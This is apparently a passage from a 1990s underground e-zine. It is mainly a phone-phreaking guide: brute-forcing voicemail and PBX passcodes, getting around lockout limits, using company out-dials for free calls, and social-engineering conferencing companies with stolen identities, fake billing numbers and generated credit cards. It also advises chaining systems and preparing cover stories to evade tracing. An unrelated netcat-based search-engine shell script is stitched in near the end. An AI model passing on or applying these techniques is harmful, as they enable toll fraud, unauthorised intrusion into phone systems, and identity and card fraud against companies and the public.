Go back to the original prompt and try some extension numbers until you get one or two that work. Seeing as the box numbers are always the same as the extension numbers, you now know some valid box numbers, or better still the range of valid box numbers. Ideally you want unused boxes in their default state. These unused extensions/boxes don't have a "Hi, leave a message for John Smith here" on them. Depending where you are in the system, dialling 011 will put you through to a directory system where you can dial in a name using the number/letter combinations on your telephone keypad. Try SMITH or JONES; you should get a few numbers this way.

Once you have valid boxes you need the pass-codes, so go to the login (*81) and try the default pass-code, i.e. the box number itself. Empty boxes are more likely to work in this way; failing that, try some 1234, 1111 sequences (good for thick giggly admin department boxes :)). You should be able to get at least one box this way. You will have noticed that 3 unsuccessful pass-code tries will throw you out. With one valid box you can get around this. Try 2 boxes then log into your valid box, now try two more and so on until you get more boxes. As long as you enter one valid code combination in 3 you are fine. This is the sort of feature that most systems have and makes hacking them much easier.

To see if you have an out-dial here enter 09+number to dial+#; if it dials you have got one (remember to work out what country your system is in first though). Which brings us on to....

*Out-dials

This is basically dialling into a company's phone system (PBX), gaining access and dialling out. The net result is that you only pay for the call to the company. If this is an 0800 number then you don't pay anything. There are two ways you might come across out-dials.

1. Straightforward PBX extenders

Background:- A company wants its sales staff to be able to call internationally from home for free, so they set up an 0800 PBX extender.
This allows the person to dial free to the company number and then out to the desired destination (on the company bill). They work mostly like this: you dial a certain number and get another dialling tone, another sort of tone or even a voice prompt ("enter your 4 digit ID" etc.). An incorrect tone will often give a two-tone alarm signal (don't worry, it is just an audible prompt). Once you enter the correct code (normally plus a #) you may get another dial-tone which you can use as if dialling from your own phone. You may have to enter 9 or 0 or similar to get a line. You may need to add a # to the end of the number.

Hacking them:- These are only easy to hack if the code is something stupid like 1111, 2222, 1234 etc., +#, which it often is. The first thing you need to know is the length of the code. You may be able to get this by entering the numbers very slowly and listening. After the correct number of digits there may be the alarm tone or a soft click. If not, you have to assume it is 4 or less. If it is not, you are going to have a hell of a job cracking it anyway! Try the common defaults as described and any other easy-to-remember numbers. You may notice that it bleeps you out after only 2 numbers when say entering 12 but after 4 numbers when trying 4567. This may be a clue to the start of the sequence. If you have a group of bored, nerdy friends (you may be a student for example ;-)) you can split up the 9999 possible combinations between you. This should only take 10 of you a couple of hours. The speed of these things is often dependent on how many tries a system lets you have before throwing you out. Another way is to use a PBX hacker program, which I won't go into except to say that they come with their own documentation, they don't often work unless you know the exact format of the switch (PBX), and can't be used from phone boxes (can you explain 9999 calls to the same number?!)

2. "Hidden" PBX's.
Background:- Most larger companies have their own PBX systems with 0800 access numbers. Some of them will intentionally want people to be able to dial through them; others just don't know it can be done or have configured them incorrectly. Their out-dial may be on a certain extension or hidden behind a VMB (see the VMB section on Meridians).

Hacking them:- This can be as easy as ringing the 0800 sales line of some company, asking for another dept, say accounts, asking to be put through to the operator and saying "Hi I'm Dave from accounts, I can't seem to get an outside line. Could you dial this number for me?" - this may or may not work! There are a number of ways depending on the make of the system and the way it is configured. I can't give you a sure-fire way on all systems. You may just be able to dial 9+the-number-you-want+# or 09+.... etc. You may have to try every extension until you get a tone. You may have to hack the system's admin box first to change some options. You may have to hack a certain box. Meridian systems often allow 09+number+# but only after you have logged in successfully to a mail-box. There may be calling masks set up by the administrator which restrict outgoing calls to nil or a limited range (e.g. local calls or free-fone calls only). So (on most Meridians for example) having a valid box/code is not always enough. However, you may be able to fool the mask on a UK system by entering 141 in front of the number you want as the system is often checking for zeros. Keep trying different 0800 numbers until you find systems that you can hack. ANY fool can hack a Meridian. Once you have found some with out-dials, you have got your phree calls without any fancy kit.

*What is the real number?*

Although you may be dialling an 0800 number you can be sure that there is a normal number like 01454 654312 or whatever linked to it. If you dial 17070 (in BT areas) from your out-dial it will tell you what number you are really at.
If this doesn't work, dial your own number and do a 1471 job on it. This means that if you want to pretend to be someone else, or specifically to pretend to be from that company, you can! All but a really determined trace will do is show up the wrong number.

*Linking them up*

Linking up your out-dials will extend their usefulness. If you have an 0800 out-dial that terminates in the USA, thus allowing dialling to US numbers, you can use it to dial 1-800 numbers, which are the yank equivalent of our 0800 numbers. Americans are way ahead in the use of mail/switching systems and out-dials, conferences etc. abound.

*Keeping hold of them*

Using out-dials is obviously illegal. Not only are you gaining unauthorised access to a system (i.e. hacking) but you are stealing call credit from the company. BT and the company have a vested interest in stopping you or catching you. Here are some guidelines:

I. The first rule is do not give the numbers/codes out to anyone else. As soon as you do you can be sure that they will too, and so on, and so on. At least one of these people will be a twat and use it to call Mexican sex-lines for 4 hours at 2am on a Sunday. It will either get closed down or they will set up a trace.

II. Use them wisely. As with all crime, you should be fine unless you get noticed. So if you call numbers that are likely to be called from that company, are of a normal length, during normal times etc. you are unlikely to raise any eyebrows.

III. Linking out-dials up makes tracing your call much harder, especially if you cross international boundaries. This will often throw the phone companies' systems and can make prosecution harder. The most likely way of tracing calls is going to be from the point which you 1st call in at. Seeing as you are only making freefone calls from that point it will not be showing up in any bills. They are not losing and are not monitoring. Should the second company notice, they will trace it back to the first company.
Do this through 3 or 4 and things start looking good for you!

IV. Try not to use them from home.

V. Don't stay on for long. Using one out-dial to access the Internet for hours at a time is one way of getting noticed.

VI. Be paranoid. No matter how careful you are being, there may be others using the same out-dial recklessly. You could get caught in the same net. It is a good idea to tell your call recipient to have a cover story ready in case they are called to see who called them at a certain time. "Oh yeah, I have been getting odd calls, sometimes they just don't speak so I just leave the receiver off the hook and come back to it in an hour" or "Fuck off you running-dog capitalist pig, I don't have to tell you anything".

**Conferences**

For spending hours talking to your geeky phreakin' mates you really need to start accessing conference systems. These are basically systems which join multiple lines together so all parties can speak to each other in real time. Those shite Partyline things are basically fucking expensive conferences (although now they are not allowed to even be real-time!). There are two general ways of accessing conferences.

1. Social Engineering/Carding

This is a piece of piss. Ring up your directory enquiries or look on the Internet for teleconferencing numbers. A good way of accessing these things is to call the USA through one of your US-terminating out-dials. This allows you access to the many US based conferencing companies as well as hiding your phone number. You need some information before you call. Get some US names and addresses - check out the Internet. People often put such info at the bottom of their newsgroup postings. The name, address, zip code and telephone number must match. Basically just ring them up and ask to set up a conference. The conversation will go something like this:-

TC  "Hello, thank you for choosing XYX Teleconferencing Ltd, how may I help you?"
You "Hi, I would like to set up a conference please"
TC  "Sure, when would you like it for?"
You "In about 15 minutes"
TC  "How long for and for how many people, sir?"
You "4 hours and for twenty people please"
TC  "What is your company name, your name and address please"
You "3M corporation, John Mackenzie, 1020 Slow St, Happy Valley, Minnesota, zip code 12232"
TC  "Was that Mackintosh?" - (how!?)
You "No, that's MACKENZIE"
TC  "Sorry about that"
You "No problem, it's a bad line" - probably because you're calling through 16 extenders!
TC  "And what's the billing number?"
You "That's 1-513-2344-3434"
TC  "Fine, that has been set up - please dial 1-800-854-8554 to access your conference. The conference number will be 54334. What would you like for your pass-code?"
You "Err, 8232 please. Oh, by the way, I have some people accessing the conference from the UK. What number do they need to dial?"
TC  "That will be 0800-756-3333"
You "Thanks"

Now you and your mates can call the relevant access numbers and enter the codes and get chatting. This works virtually every time with most of these companies - think about it, how the fuck are they supposed to find out who is valid or not from that info. You can even get cheeky and use someone's account. Try calling AT&T teleconferencing and saying you are John Doe from some big company. Try anything you like. Remember they really don't know who you are. Some companies allow billing to a credit card. You can generate these pretty easily using CreditMaster and use them. This however does tend to carry a heavy penalty and also fucks over some poor unsuspecting member of the public (if that bothers you). Anyway there's no need.

2. Company Conferencing Systems

Companies, having realised how handy but expensive teleconferencing is, have set up their own conference boxes. The most common one in the USA is Meeting Place.
You will find these on the end of 0800 numbers or on extensions of Octel VM systems (try spelling MEETING into the directory to find the extension or just get scanning). They welcome you with "Welcome to Meeting Place. To attend a meeting press 1. To access your profile press 2 etc". What you need is a valid profile number. These are 3-17 digits but generally are between 4 and 6. You just have to keep trying until you find one. (There are default profiles on 0001, 0002 and 0003.) The pass-code may be something like 123456. Once you are on these you can set up conferences whenever you like for loads of people. You can lock the session, form splinter sessions and boot people out like IRC. You don't need to know too much more as they are voice-prompt city. However there are some important features which stop you from getting noticed - the exact layout of Meeting Place is in another text file, cryptically entitled "Phreaking Conferences with Meeting Place".

See ya

uV and Senor Cardini

**************************************************

Shouts to Darkcyde Communications + Hy8rid + Public Nuisance + Nitrous Oxide


#! /bin/sh
## Hit the major search engines.  Hose the [large] output to a file!
## autoconverts multiple arguments into the right format for given servers --
## usually worda+wordb, with certain lame exceptions like dejanews.
## Extracting and post-sorting the URLs is highly recommended...
##
## Altavista currently handled by a separate script; may merge at some point.
##
## _H* original 950824, updated 951218 and 960209

test "${1}" = "" && echo 'Needs argument[s] to search for!' && exit 1
PLUSARG="`echo $* | sed 's/ /+/g'`"
PIPEARG="`echo ${PLUSARG} | sed 's/+/|/g'`"
IFILE=/tmp/.webq.$$

# Don't have "nc"?  Get "netcat" from avian.org and add it to your toolkit.
doquery () {
  echo GET "$1" | nc -v -i 1 -w 30 "$2" "$3"
}

# changed since original: now supplying port numbers and separator lines...

echo "=== Yahoo ==="
doquery "/bin/search?p=${PLUSARG}&n=300&w=w&s=a" search.yahoo.com 80

echo '' ; echo "=== Webcrawler ==="
doquery "/cgi-bin/WebQuery?searchText=${PLUSARG}&maxHits=300" webcrawler.com 80

# the infoseek lamers want "registration" before they do a real search, but...
echo '' ; echo "=== Infoseek ==="
echo "   is broken."
# doquery "WW/IS/Titles?qt=${PLUSARG}" www2.infoseek.com 80
# ... which doesn't work cuz their lame server wants the extra newlines, WITH
# CRLF pairs ferkrissake.  Fuck 'em for now, they're hopelessly broken.  If
# you want to play, the basic idea and query formats follow.
# echo "GET /WW/IS/Titles?qt=${PLUSARG}" > $IFILE
# echo "" >> $IFILE
# nc -v -w 30 guide-p.infoseek.com 80 < $IFILE

# this is kinda flakey; might have to do twice??
echo '' ; echo "=== Opentext ==="
doquery "/omw/simplesearch?SearchFor=${PLUSARG}&mode=phrase" \
  search.opentext.com 80

# looks like inktomi will only take hits=100, or defaults back to 30
# we try to suppress all the stupid rating dots here, too
echo '' ; echo "=== Inktomi ==="
doquery "/query/?query=${PLUSARG}&hits=100" ink3.cs.berkeley.edu 1234 | \
  sed '/^$/d'

#djnews lame shit limits hits to 120 and has nonstandard format
echo '' ; echo "=== Dejanews ==="
doquery "/cgi-bin/nph-dnquery?query=${PIPEARG}+maxhits=110+format=terse+defaultOp=AND" \
  smithers.dejanews.com 80

# OLD lycos: used to work until they fucking BROKE it...
# doquery "/cgi-bin/pursuit?query=${PLUSARG}&maxhits=300&terse=1" \
#   query5.lycos.cs.cmu.edu 80
# NEW lycos: wants the User-agent field present in query or it returns nothing
# 960206: webmaster@lycos duly bitched at
# 960208: reply received; here's how we will now handle it:
echo \
  "GET /cgi-bin/pursuit?query=${PLUSARG}&maxhits=300&terse=terse&matchmode=and&minscore=.5 HTTP/1.x" \
  > $IFILE
echo "User-agent: *FUCK OFF*" >> $IFILE
echo "Why: go ask todd@pointcom.com (Todd Whitney)" >> $IFILE
echo '' >> $IFILE
echo '' ; echo "=== Lycos ==="
nc -v -i 1 -w 30 twelve.srv.lycos.com 80 < $IFILE
rm -f $IFILE
exit 0

# CURRENTLY BROKEN [?]
# infoseek
# some args need to be redone to ensure whatever "and" mode applies


[ASCII-art banner: The End]

<*> Use this information at your own risk. Neither the staff and contributors to Underground Periodical, nor the persons providing or hosting Underground Periodical, will assume ANY responsibility for the use, misuse, or abuse of any information provided herein. The previous information is provided for educational purposes ONLY. This information is NOT to be used for any illegal purposes whatsoever.

<*> By reading Underground Periodical you ARE AGREEING to the following terms: I understand that using this information is illegal. I agree to, and understand, that I am responsible for my own actions. If I get into trouble using this information for the wrong reasons, I promise not to place the blame on Underground Periodical staff, contributors, or anyone that provided this issue or any other issue of Underground Periodical, whether it were official or without notification. I understand that this information is for educational purposes only.

Thanks for reading.

:..::..End Of File..::..: